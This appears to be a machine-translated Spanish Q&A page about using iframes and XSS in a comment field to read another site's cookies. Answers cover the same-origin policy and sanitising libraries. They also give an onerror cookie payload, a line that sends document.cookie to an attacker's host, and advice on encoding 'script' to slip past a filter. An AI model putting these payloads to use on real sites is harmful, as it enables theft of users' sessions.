Estoy experimentando con scripts de sitios cruzados. Tengo un sitio web que permite a los usuarios insertar comentarios y verlos en el sitio web. El sitio web filtra el "script" de cadena a través del comentario pero permite iframes. Entiendo que podría insertar un iframe que apunta a un sitio web que he creado y puedo ejecutar el script que desee. Mi pregunta es: ¿mi script iframe podrá leer las cookies iniciadas por el sitio web original? Intenté alert (document.cookie) pero muestra una alerta sin nada. El sitio web original siempre establece una cookie cuando un cliente lo solicita. ¿Alguna idea de lo que me estoy perdiendo?scripts de sitios cruzados con Iframe
Respuesta
Tanto la página circundante tienen que venir del mismo dominio. Esto está limitado por la misma política de origen, que establece que una secuencia de comandos en un marco solo puede acceder a datos en otro marco dado que están en el mismo protocolo, tienen el mismo nombre de dominio y se ejecutan en el mismo puerto. Se puede relajar ligeramente estableciendo document.domain en el dominio de nivel superior en ambos marcos, y permitiendo así que los marcos del subdominio se comuniquen.
Aunque podría intentar ingresar, aunque puede estar bloqueado en los navegadores más nuevos.
La secuencia de comandos de limitación no es suficiente para detener XSS. Hay muchas otras muchas formas. Ver http://html5sec.org y http://ha.ckers.org/xss.html
Si entiendo correctamente, es la cuestión del iframe del niño establecer el document.domain, ¿no es así? * (ya que hacerlo en el documento principal devuelve un error de red) * – user2284570
Por lo que sé, un iframe no puede acceder al sitio web original si el dominio del iframe y el dominio del sitio web original son diferentes, pero hay other problems. (Ej. Galleta comentando <img src="asdf" onerror="alert(document.cookie)"/>
)
Es posible que desee utilizar tantos como HTML Purifier ....
cookies siguen política del mismo origen. Entonces, si el sitio web de ataque y el sitio web de la víctima (que permite la apertura de iframes) tienen el mismo host, la ventana emergente de ejecutar document.cookie conatin la información de las cookies. Dado que en su caso parecen tener dominios diff, no será posible robar las cookies. Para evitar XSS de una mejor manera, utilice la etiqueta C: out de la biblioteca core jstl
¿Parece que está intentando usar la cookie como carga útil para el XSS?
¿Estás tratando de robarte la cookie?
Pero si el sitio es lo que le permite insertar comentarios y sólo la eliminación de "guión", entonces usted tiene un montón de alternativas para la inserción de XSS incluyendo la escritura robar coookie.
probar este
javascript:img=new Image();img.src="http://yoursite.com?cookie="+document.cookie;
pero desea codificar el guión palabra por lo que puede en su lugar se puede tratar
script de
o Unicode 73 63 72 69 70 74
- 1. XMLHttpRequest scripts de sitios cruzados en el mismo servidor pero puerto diferente
- 2. ¿Cuáles son los posibles vectores de ataque para scripts reflejados en sitios cruzados?
- 3. Obtiene el contenido de DOM del iframe de dominios cruzados
- 4. Creación de scripts entre sitios desde una imagen
- 5. AJAX de dominios cruzados: ¿funcionaría este método?
- 6. Solicitudes de dominios cruzados con jQuery
- 7. IE9 arroja excepciones al cargar scripts en iframe. ¿Por qué?
- 8. Dominio IFrame de dominios cruzados, acceso desde el JavaScript de los padres
- 9. ¿Cómo maneja Firebase problemas cruzados de origen?
- 10. cómo comprobar desde qué iframe de dominios cruzados llegó el mensaje (postMessage)?
- 11. WebView con un android IFRAME
- 12. Autenticación de dominios cruzados
- 13. jQuery.data() y compatibilidad con navegadores cruzados?
- 14. creación de scripts con eshell
- 15. ¿Cómo lidiar con las excepciones de acceso de hilos cruzados?
- 16. Intercambio de recursos cruzados de origen con PrototypeJS
- 17. ¿Qué desencadena "Internet Explorer ha modificado esta página para ayudar a evitar la creación de scripts entre sitios"?
- 18. Solución de video en línea compatible con navegadores cruzados
- 19. Compatibilidad con navegadores cruzados de Google GWT: ¿es BS?
- 20. Botón de recarga Iframe
- 21. navegadores cruzados jquery animate scrollTop
- 22. HAproxy con múltiples sitios https
- 23. Configurar múltiples sitios con Varnish
- 24. Ejecutando R Scripts con Gráficos
- 25. compilar PHP con scripts ant
- 26. Em vs Px y compatibilidad con navegadores cruzados
- 27. Microsoft CRM 2011 y compatibilidad con navegadores cruzados
- 28. Conjunto iframe allowfullscreen con javascript
- 29. jQuery agregar iFrame con contenido
- 30. Sirviendo múltiples sitios de Django con Nginx con UWSGI
Para acceder a una página principal de una iframe (ambas páginas en la misma doimain), use el objeto 'parent', por ej. 'parent.document.cookie' –